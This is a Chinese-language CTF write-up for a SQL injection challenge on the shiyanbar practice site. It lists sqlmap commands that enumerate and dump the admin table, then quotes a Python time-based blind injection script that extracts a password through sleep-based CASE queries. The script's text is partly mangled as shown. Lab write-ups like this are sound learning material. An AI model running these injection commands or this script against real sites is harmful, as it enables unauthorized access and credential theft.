【fairy】實驗吧——看起來有點難
阿新 • • 發佈:2018-12-12
題目連結:ctf5.shiyanbar.com/basic/inject/index.php
看起來像是注入,比較菜,就直接sqlmap了= =
1)爆庫:sqlmap -u “ctf5.shiyanbar.com/basic/inject/index.php?admin=admin&pass=admin&action=login” --dbs
2)爆表:sqlmap -u "ctf5.shiyanbar.com/basic/inject/index.php?admin=admin&pass=admin&action=login" --table -D test
3)爆欄位:sqlmap -u "ctf5.shiyanbar.com/basic/inject/index.php?admin=admin&pass=admin&action=login" --dump -T admin -D test
獲得密碼:idnuenna,登入獲得key
4)最後附上大佬的exp:
#-*-coding:utf-8-*- import requests import time payloads = '[email protected]_.{}*' #不區分大小寫的 flag = "" key=0 print("Start") for i in range(1,50): if key == 1: break for payload in payloads: starttime = time.time()#記錄當前時間 headers = {"Host": "ctf5.shiyanbar.com", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3", "Accept-Encoding": "gzip, deflate", "Cookie": "Hm_lvt_34d6f7353ab0915a4c582e4516dffbc3=1470994390,1470994954,1470995086,1471487815; Hm_cv_34d6f7353ab0915a4c582e4516dffbc3=1*visitor*67928%2CnickName%3Ayour", "Connection": "keep-alive", } url = "http://ctf5.shiyanbar.com/basic/inject/index.php?admin=admin' and case when(substr(password,%s,1)='%s') then sleep(10) else sleep(0) end and ''='&pass=&action=login" %(i,payload)#資料庫 res = requests.get(url, headers=headers) if time.time() - starttime > 10: flag += payload print("pwd is:%s"%flag) break else: if payload == '*': key = 1 break print('[Finally] current pwd is %s'% flag)